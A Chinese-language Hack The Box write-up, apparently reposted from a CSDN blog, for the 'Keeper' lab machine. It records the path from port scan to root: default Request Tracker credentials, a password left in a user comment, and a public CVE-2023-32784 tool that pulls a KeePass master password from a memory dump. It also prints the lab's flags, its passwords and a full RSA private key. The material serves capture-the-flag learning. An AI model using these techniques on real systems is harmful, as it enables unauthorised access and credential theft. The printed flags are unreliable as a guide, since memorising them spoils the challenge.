HTB:Keeper[WriteUP]
目录
1.How many open TCP ports are listening on Keeper?
2.What is the default password for the default user on Request Tracker (RT)?
4.What is the lnorgaard user's password on Keeper?
5.Submit the flag located in the lnorgaard user's home directory.
USER_FLAG:9eaf55f30303be882a65e5c440347354
7.What is the master password for passcodes.kdbx?
9.Submit the flag located in the root user's home directory.
接下来我们可以通过PuTTY相关工具将这种格式的SSH键还原成SSH私钥
ROOT_FLAG:c2dc23cb8bffab07116df7f112daf2d7
连接至HTB服务器并启动靶机
靶机IP:10.10.11.227
分配IP:10.10.16.7
1.How many open TCP ports are listening on Keeper?
使用fscan对靶机端口进行扫描:
fscan -nopoc -nobr -no -h {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.11.227___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
10.10.11.227:80 open
10.10.11.227:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.227 code:200 len:149 title:None
已完成 2/2
[*] 扫描结束,耗时: 572.329065ms
由扫描结果可见,靶机开放端口22、80共2个端口
2.What is the default password for the default user on Request Tracker (RT)?
使用浏览器访问靶机80端口URL:http://{TARGET_IP}
发现页面中存在一条连接,点击后跳转至tickets.keeper.htb,然而页面却是空白
修改hosts文件,增加一条本地DNS解析
echo '{TARGET_IP} tickets.keeper.htb' >> /etc/hosts再次使用浏览器访问:http://tickets.keeper.htb
接下来直接把问题扔给Google,RT默认账户:root,默认密码:password
直接使用凭证对靶机页面进行登录:
账户:root
密码:password
点击:管理员->用户->选择
在选择用户下方可以看到,除了root用户还存在用户:lnorgaard
4.What is the lnorgaard user's password on Keeper?
点击Inorgaard用户名称:
往下拉可以看到对于该用户的注释,其中写出了该用户密码为:Welcome2023!
账户:lnorgaard
密码:Welcome2023!
5.Submit the flag located in the lnorgaard user's home directory.
使用上文获取到的凭证,对靶机SSH服务器进行登录:
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh lnorgaard@10.10.11.227
lnorgaard@10.10.11.227's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$ whoami
lnorgaard
查找user.txt文件位置,并查看user.txt文件内容:
cat `find / -name 'user.txt' 2>/dev/null`lnorgaard@keeper:~$ cat `find / -name 'user.txt' 2>/dev/null`
9eaf55f30303be882a65e5c440347354
USER_FLAG:9eaf55f30303be882a65e5c440347354
6.What is the 2023 CVE ID for a vulnerability in KeePass that allows an attacker access to the database's master password from a memory dump?
查看当前位置,并列出当前目录所有文件:
lnorgaard@keeper:~$ pwd
/home/lnorgaard
lnorgaard@keeper:~$ ls
RT30000.zip user.txt
将RT30000.zip文件进行解压:
lnorgaard@keeper:~$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp passcodes.kdbx RT30000.zip user.txt
发现这俩后缀没一个认识的,把这俩后缀名扔给AI,问问是什么文件:
.dmp 文件:
- 全称:Dump 文件,也称为转储文件。
- 用途:通常是在程序出现错误或异常时由系统或软件自动生成,用于记录特定时刻程序的状态信息,以便开发人员进行故障分析和调试。例如,Windows 系统在遇到蓝屏错误时会生成内存转储文件(.dmp 文件),可以帮助技术人员确定导致系统崩溃的原因。
- 打开方式:可以使用特定的调试工具来查看和分析.dmp 文件,如 Windows 系统下的 WinDbg 等。
.kdbx 文件:
- 全称:通常是 KeePass Password Safe 数据库文件的扩展名。
- 用途:KeePass 是一款开源的密码管理软件,.kdbx 文件用于存储用户的各种密码、用户名、网站地址等敏感信息。该文件通常经过加密保护,以确保密码的安全性。
- 打开方式:可以使用 KeePass 软件本身打开.kdbx 文件,用户需要输入正确的主密码或密钥才能访问其中存储的密码信息。
将RT30000.zip文件通过SCP协议下载到本地:
scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
lnorgaard@10.10.11.227's password:
RT30000.zip 100% 83MB 1.2MB/s 01:07
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
RT30000.zip
将本题直接扔给Google:
从AI口中得知.dmp为转储文件可能存储着.kdbx文件密码,尝试利用Exp对它进行信息读取
下载关于CVE-2023-32784的Exp并进入其目录下:
git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper7.What is the master password for passcodes.kdbx?
解析该文件信息:
dotnet run /home/kali/Desktop/temp/KeePassDumpFull.dmpPassword candidates (character positions):
Unknown characters are displayed as "●"
1.: ●
2.: ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.: d,
4.: g,
5.: r,
6.: ø,
7.: d,
8.: ,
9.: m,
10.: e,
11.: d,
12.: ,
13.: f,
14.: l,
15.: ø,
16.: d,
17.: e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
成功获取到了主密码:dgrød med fløde
由于该Exp无法处理非ASCII字符,而且无法恢复首位字符
我们把这个字符产扔进Google,尝试恢复它原本的模样
获取到最终的主密码:rødgrød med fløde
8.What is the first line of the "Notes" section for the entry in the database containing a private SSH key?
启动KeePass Command Line Interface:
kpcli打开passcodes.kdbx文件:
open passcodes.kdbx列出所有组:
ls进入passcodes组中:
cd passcodes列出所有组:
ls进入Network组中:
cd Network列出所有条目:
ls格式化展示第0条条目:
show 0 -f┌──(root㉿kali)-[/home/kali/Desktop]
└─# kpcliKeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.kpcli:/> open passcodes.kdbx
Provide the master password: *************************kpcli:/> ls
=== Groups ===
passcodes/kpcli:/> cd passcodes
kpcli:/passcodes> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/passcodes> cd Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing Systemkpcli:/passcodes/Network> show 0 -f
Title: keeper.htb (Ticketing Server)
Uname: root
Pass: F4><3K0nd!
URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
从条目输出可见,Notes部分的第一行为:PuTTY-User-Key-File-3: ssh-rsa
而这一整个Notes部分,其实就是root用户的PuTTY格式SSH键
9.Submit the flag located in the root user's home directory.
将Notes部分内容,全部写入文件中:
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
接下来我们可以通过PuTTY相关工具将这种格式的SSH键还原成SSH私钥
安装秘钥生成工具:puttygen
apt install putty-tools使用该工具生成SSH私钥:
puttygen ssh_pri_key -O private-openssh -o id_rsa┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls -l id_rsa
-rw------- 1 root root 1675 Oct 15 09:36 id_rsa
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAp1arHv4TLMBgUULD7AvxMMsSb3PFqbpfw/K4gmVd9GW3xBdP
c9DzVJ+A4rHrCgeMdSrah9JfLz7UUYhM7AW5/pgqQSxwUPvNUxB03NwockWMZPPf
Tykkqig8VE2XhSeBQQF6iMaCXaSxyDL4e2ciTQMt+JX3BQvizAo/3OrUGtiGhX6n
FSftm50elK1FUQeLYZiXGtvSQKtqfQZHQxrIh/BfHmpyAQNU7hVW1Ldgnp0lDw1A
MO8CC+eqgtvMOqv6oZtixjsV7qevizo8RjTbQNsyd/D9RU32UC8RVU1lCk/LvI7p
5y5NJH5zOPmyfIOzFy6m67bIK+csBegnMbNBLQIDAQABAoIBAQCB0dgBvETt8/UF
NdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6joDni1wZdo7hTpJ5Zjdmz
wxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6A
XSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputYf7n24kvL0WlBQThsiLkK
cz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzTVkCew1DZuYnYOGQxHYW6
WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivzUXjcCAviPpmSXB19UG8J
lTpgORyhAoGBAPaR+FID78BKtzThkhVqAKB7VCryJaw7Ebx6gIxbwOGFu8vpgoB8
S+PfF5qFd7GVXBQ5wNc7tOLRBJXaxTDsTvVy+X8TEbOKfqrKndHjIBpXs+Iy0tOA
GSqzgADetwlmklvTUBkHxMEr3VAhkY6zCLf+5ishnWtKwY3UVsr+Z4f1AoGBAK28
/Glmp7Kj7RPumHvDatxtkdT2Iaecl6cYhPPS/OzSFdPcoEOwHnPgtuEzspIsMj2j
gZZjHvjcmsbLP4HO6PU5xzTxSeYkcol2oE+BNlhBGsR4b9Tw3UqxPLQfVfKMdZMQ
a8QL2CGYHHh0Ra8D6xfNtz3jViwtgTcBCHdBu+lZAoGAcj4NvQpf4kt7+T9ubQeR
RMn/pGpPdC5mOFrWBrJYeuV4rrEBq0Br9SefixO98oTOhfyAUfkzBUhtBHW5mcJT
jzv3R55xPCu2JrH8T4wZirsJ+IstzZrzjipe64hFbFCfDXaqDP7hddM6Fm+HPoPL
TV0IDgHkKxsW9PzmPeWD2KUCgYAt2VTHP/b7drUm8G0/JAf8WdIFYFrrT7DZwOe9
LK3glWR7P5rvofe3XtMERU9XseAkUhTtqgTPafBSi+qbiA4EQRYoC5ET8gRj8HFH
6fJ8gdndhWcFy/aqMnGxmx9kXdrdT5UQ7ItB+lFxHEYTdLZC1uAHrgncqLmT2Wrx
heBgKQKBgFViaJLLoCTqL7QNuwWpnezUT7yGuHbDGkHl3JFYdff0xfKGTA7iaIhs
qun2gwBfWeznoZaNULe6Khq/HFS2zk/Gi6qm3GsfZ0ihOu5+yOc636Bspy82JHd3
BE5xsjTZIzI66HH5sX5L7ie7JhBTIO2csFuwgVihqM4M+u7Ss/SL
-----END RSA PRIVATE KEY-----
使用该私钥对靶机SSH服务器进行连接:
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh root@10.10.11.227 -i id_rsa
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsYou have new mail.
Last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41
root@keeper:~# whoami
root
查找root.txt文件位置,并查看此文件内容:
cat `find / -name 'root.txt' 2>/dev/null`ROOT_FLAG:c2dc23cb8bffab07116df7f112daf2d7
原文地址:https://blog.csdn.net/qq_43007452/article/details/142946857
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!